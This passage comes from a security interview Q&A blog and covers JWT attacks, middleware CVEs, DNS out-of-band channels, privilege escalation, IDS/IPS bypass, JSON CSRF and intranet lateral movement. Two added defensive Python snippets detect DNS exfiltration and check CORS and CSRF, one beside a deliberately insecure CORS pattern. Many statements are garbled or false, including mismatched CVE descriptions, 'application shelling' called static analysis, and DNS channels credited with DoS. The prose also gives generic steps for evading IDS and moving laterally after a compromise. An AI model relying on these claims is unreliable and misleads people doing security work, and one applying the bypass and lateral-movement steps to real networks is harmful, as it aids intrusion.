5. Exploiting JWT signature attacks: An attacker can use a malicious signature to make a JWT trustworthy in an unauthorized manner, and use the altered JWT to access protected resources in the application.

6. Attempting brute force: An attacker can try to guess and crack the JWT's key multiple times to obtain the session token.

7. Time-to-live attack: An attacker can create a JWT so that it has a longer survival time than the actual permission expiration time.

8. Exploiting JWT caching attacks: JWT may be cached in a proxy server or browser, so an attacker can obtain a valid JWT from it.

9. Exploiting JWT replay attacks: An attacker can intercept requests for protected resources, obtain the JWT and resend it to gain access.

10. Attack using absolute paths in JWT: Because JWT may use absolute paths instead of relative paths, attackers can use this absolute path to obtain higher permissions.

82. What are some examples of JAVA middleware vulnerabilities?

1. Apache Tomcat Cipher Transformation Connection Improper Configuration Vulnerability (CVE-2015-5351)

2. Apache Tomcat reflective file upload vulnerability (CVE-2017-12615)

3. Apache Tomcat HttpOnly mark missing vulnerability (CVE-2008-5515)

4. Apache ActiveMQ reflective command execution vulnerability (CVE-2015-1830)

5. Apache Struts2 invalid escape vulnerability (CVE-2016-3087)

6. Apache HTTP Server protocol improper handling vulnerability (CVE-2016-8743)

7. IBM WebSphere Application Server LDAP injection vulnerability (CVE-2016-9458)

8. IBM WebSphere Application Server XFF header information leakage vulnerability (CVE-2015-2080)

9. IBM WebSphere Application Server parameter injection vulnerability (CVE-2017-1393)

10. Oracle WebLogic Server weak password vulnerability (CVE-2018-2628)

83. What vulnerabilities can DNS out-of-band (DNS exfiltration) channels be used for?

1. SQL injection: using a DNS out-of-band channel, an attacker can read database files on a protected server and retrieve meaningful information.

2. Cross-site scripting: attackers can use DNS out-of-band channels to install malicious scripts in the victim's browser and obtain account information.

3. XML external entity attack: through a DNS out-of-band channel, the attacker can inject malicious code into the victim's system and gain more permissions.

4. DNS spoofing/hijacking: by utilizing a DNS out-of-band channel, an attacker can hijack the DNS resolution of the target system and redirect requests to a malicious server.

5. XSS attack: attackers can use DNS out-of-band channels to inject malicious scripts into the target website to carry out XSS attacks.

6. Denial of service: attackers can use DNS out-of-band channels to carry out denial-of-service attacks, putting pressure on the target system.
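Whatever vulnerability feeds it, the out-of-band channel itself looks the same on the resolver: many distinct, long or high-entropy subdomain labels under one attacker-controlled domain. The following added example (not from the original article) scores a constructed resolver log for that pattern.

```python
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed resolver log as (client, queried name) pairs; not from a real
# network. The hex labels under example.net are stand-ins for chunked data.
SAMPLE_QUERIES: List[Tuple[str, str]] = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.8", "4a6f686e2e446f65.0a3a7573657273.tunnel.example.net"),
    ("10.0.0.8", "3132372e302e302e31.0a3a7061737377.tunnel.example.net"),
    ("10.0.0.8", "726f6f743a78.0a3a30.tunnel.example.net"),
    ("10.0.0.8", "7365637265742d6b6579.tunnel.example.net"),
]


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores high, words score low."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name: str) -> str:
    """Crude last-two-labels approximation; use a public-suffix list in production."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def find_exfil_candidates(queries: List[Tuple[str, str]], max_avg_len: float = 32.0,
                          min_entropy: float = 3.0, min_unique: int = 3) -> List[Dict[str, object]]:
    """Flag (client, domain) pairs whose subdomain prefixes look like encoded data.

    A tunnel pushes one chunk per query, so the same client queries many
    distinct prefixes under one domain, and those prefixes are long or
    high-entropy. Ordinary traffic reuses a handful of short, wordy names.
    """
    prefixes: Dict[Tuple[str, str], set] = defaultdict(set)
    for client, name in queries:
        name = name.rstrip(".").lower()
        dom = registered_domain(name)
        prefixes[(client, dom)].add(name[: -len(dom)].rstrip("."))
    findings: List[Dict[str, object]] = []
    for (client, dom), seen in prefixes.items():
        if len(seen) < min_unique:
            continue
        avg_len = sum(map(len, seen)) / len(seen)
        avg_ent = sum(map(shannon_entropy, seen)) / len(seen)
        if avg_len > max_avg_len or avg_ent > min_entropy:
            findings.append({"client": client, "domain": dom, "unique_prefixes": len(seen),
                             "avg_prefix_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2)})
    return findings
```
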

84. Summary of middleware vulnerabilities?

1. Weak password vulnerability in routers and router web management interfaces: attackers can brute force crack the login password of the router's web management interface and steal the router's sensitive information;

2. System password management vulnerabilities: System administrators use default passwords and easy-to-guess passwords, making it easier for attackers to obtain sensitive system information;

3. Improper configuration of middleware vulnerabilities: System administrators may improperly configure some sensitive information, such as interface configuration, interface requests, and transmission encryption, allowing attackers to access this sensitive information;

4. Middleware remote service vulnerability: The system administrator may have opened the remote service, and the attacker can attack the service and perform brute force cracking, etc.;

5. Middleware deserialization vulnerability: When processing deserialized data, many verification steps may be ignored, allowing attackers to construct malicious code;

6. Middleware XML external entity attack vulnerability: Attackers can use XML external entity attacks to access sensitive information through the XML parser;

7. Middleware online application vulnerabilities: attackers may attack online applications and steal sensitive information related to middleware;

8. Improper access control vulnerabilities: Administrators may ignore restrictions on resource access, allowing attackers to access sensitive system information;

9. Insecure coding vulnerability in middleware: Administrators may neglect to encrypt sensitive information, allowing attackers to access sensitive system information;

10. Middleware debugging vulnerability: System administrators may improperly enable the system debugging function, allowing attackers to obtain middleware system information.

85. Talk about the idea of elevating privileges in Windows and Linux systems?

Ideas for elevating privileges in Windows systems:

1. Exploiting vulnerabilities: Log in to the system as the administrator with the highest authority, collect and exploit vulnerabilities in the Windows system (including local vulnerabilities and remote vulnerabilities) to escalate privileges.

2. Exploitation tools: by using privilege escalation tools (such as FuzzySecurity's privilege escalation tooling), system privileges can be escalated once you already have some level of access.

Ideas for elevating privileges in Linux systems:

1. Exploiting vulnerabilities: Similar to Windows systems, existing vulnerabilities are exploited to escalate privileges, but the loopholes in Linux systems are more serious and it is easier to escalate privileges.

2. Exploitation tools: similar to Windows systems, scripts and the various privilege escalation tools released by the industry can be used to escalate system privileges once you already have some level of access.

86. What frameworks does python have and what vulnerabilities have appeared in them?

Python frameworks include: Django, Flask, Tornado, Pyramid, Web2py, Bottle, Hug, Cherrypy, etc.

Vulnerabilities that have appeared include: an XML entity injection vulnerability in Django, a Jinja2 template injection vulnerability in Flask, an XML entity injection vulnerability in Pyramid, an SSL encrypted data leakage vulnerability in Web2py, a remote code execution vulnerability in Bottle, path traversal vulnerabilities in Hug, etc.

87. The difference between mini program penetration and ordinary penetration

1. Mini program penetration is mainly application-layer penetration, including interface security testing, login verification, permission control, etc., while ordinary penetration relies on the system architecture and works up from the underlying protocol layer, including port interception, patch-level attacks, web security testing, database auditing, etc.

2. The purpose of mini program penetration is to find the mini program's security vulnerabilities and assess its security, while the purpose of ordinary penetration is to find the system's security vulnerabilities, audit the system's behavior, and assess the system's security.

3. Mini program penetration techniques focus more on security testing at the application layer, while ordinary penetration techniques mainly focus on security testing at the network layer and above.

88. Four major components of vulnerability testing of the app itself

1. Compilation and build tools: Compilation and build tools help developers compile and build Android apps for specific hardware platforms. These tools can find potential vulnerabilities in the source code, such as unused code, unreleased resources, or hard-coded values used in non-secure environments.

2. Application shelling: Application shelling is a static analysis technology used to analyze the source code of an application. It can detect incorrect input validation, incorrect error handling, use of uninitialized variables, or other potential problems.

3. Simulator: The simulator is a dynamic analysis technology that can simulate the behavior of an application on a real device and detect anomalies, such as incorrect memory access, incorrect exception handling, etc.

4. Testing framework: Testing framework is a testing method that combines static analysis and dynamic analysis. It allows developers to examine the application's code before implementing tests, and helps testers run the application to detect vulnerabilities.

89. IDS/IPS protection principles and bypass ideas

IDS/IPS protection mainly uses a combination of common static detection (static analysis), dynamic detection and behavioral analysis.

Static detection focuses on the characteristics of malicious behavior, such as identifying characteristics, connection characteristics, structural characteristics, etc., and analyzes data packets to confirm whether there are specific virus characteristics, thereby detecting virus attacks.

Dynamic detection, by simulating the system environment or simulating virus operation, observes whether the virus has aggressive behavior, thereby judging the aggressiveness of the virus.

Behavior analysis, by analyzing the characteristics of network behavior, determines whether there is an attack behavior, and thereby determines whether there is a virus attack.

Ways to bypass IDS/IPS protection:

1. Network camouflage: blend the attacker's traffic into the surrounding network infrastructure by changing the source or destination address, so that the IDS/IPS system does not single it out;

2. Increase the length of data packets: Attackers can increase the length of data packets and fragment the data for transmission. Malicious data packets can be hidden in other data packets, thereby bypassing the detection of the IDS/IPS system;

3. Use special characters: Attackers can use special characters to make malicious data packets into uncommon features as a means to bypass the IDS/IPS system;

4. Encrypted transmission: Attackers can use encrypted transmission so that malicious data packets will not be identified by the IDS/IPS system during transmission, thereby bypassing detection and blocking.

90. Exploitation of CSRF against JSON endpoints

CSRF, which stands for Cross-Site Request Forgery, is an attack that exploits the fact that the user is already logged in to a website, tricking the user into performing an action they do not intend. JSON endpoints can also be attacked by CSRF: the victim unknowingly visits a web page prepared by the attacker, and the victim's legitimate session is turned into the attacker's illegitimate operation.

To prevent cross-site request forgery, defensive measures include adding a CSRF token to each JSON request, checking the Referer header of each request to confirm the site of the request initiator, adding a security token on the JSON client, enabling HttpOnly to prevent JSON deserialization injection, writing solid code that limits the number of JSON requests, and enabling security controls for intranet environments, etc.
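The origin check in the paragraph above and the CORS allow-list from question 72 are the same decision seen from two sides, so one added example (not from the original article) serves both: the weak CORS pattern beside the hardened one, and a CSRF gate for a JSON endpoint that checks Content-Type, Origin/Referer and the token. The allow-listed origins are constructed.

```python
import hmac
from typing import Dict, Optional

# Constructed allow-list of origins permitted to call this API with credentials.
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def cors_headers_insecure(origin: Optional[str]) -> Dict[str, str]:
    """The weak pattern: reflect whatever Origin arrives and allow credentials.

    Any site can then read authenticated responses from the victim's browser.
    """
    return {
        "Access-Control-Allow-Origin": origin or "*",
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers(origin: Optional[str]) -> Dict[str, str]:
    """Hardened: only allow-listed origins get an Allow-Origin header at all."""
    if origin in ALLOWED_ORIGINS:
        return {
            "Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin",  # caches must not serve one origin's answer to another
        }
    return {}


def json_request_allowed(headers: Dict[str, str], session_token: str) -> bool:
    """CSRF gate for a state-changing JSON endpoint.

    A cross-site <form> can only send the "simple" content types (that is the
    classic JSON CSRF: a text/plain form body that happens to parse as JSON)
    and cannot set custom headers, so requiring application/json plus a token
    in a custom header forces a CORS preflight. The Origin/Referer check is
    the belt to that pair of braces.
    """
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False
    source = h.get("origin") or h.get("referer", "")
    if not any(source == o or source.startswith(o + "/") for o in ALLOWED_ORIGINS):
        return False
    return hmac.compare_digest(h.get("x-csrf-token", ""), session_token)
```
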

91. What vulnerabilities can be tested using data packets in json format?

JSON-format data packets can be used to test multiple vulnerabilities, such as server-side script injection, SQL injection, XML external entity (XXE) injection, path injection, reflected XSS, and stored XSS.

92. How to collect information on the intranet server?

1. Information collection through search engines: Use Google, Bing and other search engines to search for information about intranet servers;

2. Collect information through Whois query: Whois query can query the IP address, owner information, etc. of the intranet server;

3. Use the websites of network investigation companies such as Netcraft to collect information: The websites of network investigation companies such as Netcraft can query the IP address, operating system version, server type, etc. of the intranet server;

4. Collect information through the port scanner: The port scanner can query the open ports of the intranet server and determine the programs running on the server;

5. Collect information through vulnerability scanners: Vulnerability scanners can query whether there are security vulnerabilities in the intranet server and determine the vulnerability of the server;

6. Collect information through packet capture tools: Packet capture tools can capture the network data packets of the server and check the running status of the server.

93. If you compromise a machine on the boundary layer of the intranet, how do you discover other machines on the intranet?

1. First, analyze the compromised intranet machine to learn its operating system and hardware configuration, as well as the installed software, in order to make the most of the position it gives on the intranet.

2. Then, run tools to discover surrounding hosts, enumerate all reachable ports on the intranet, and examine the services they provide and how they respond.

3. By scanning the available IP address space, the existence of another computer can be identified and the type of this machine can be determined.

4. Try to connect to other computers on the intranet, and try to log in to user accounts on the systems of other computers on the intranet.

5. Try to execute some malware like viruses and Trojans to attack other computers on the intranet.

6. Launch a series of attacks within the target intranet to obtain useful information, such as credentials that can be used to access the system or network, or breach points for escalating privileges.

7. Finally, you should try to use the obtained information to attack other computers in the intranet to obtain valid information and permissions.

Origin blog.csdn.net/2301_77285187/article/details/130956153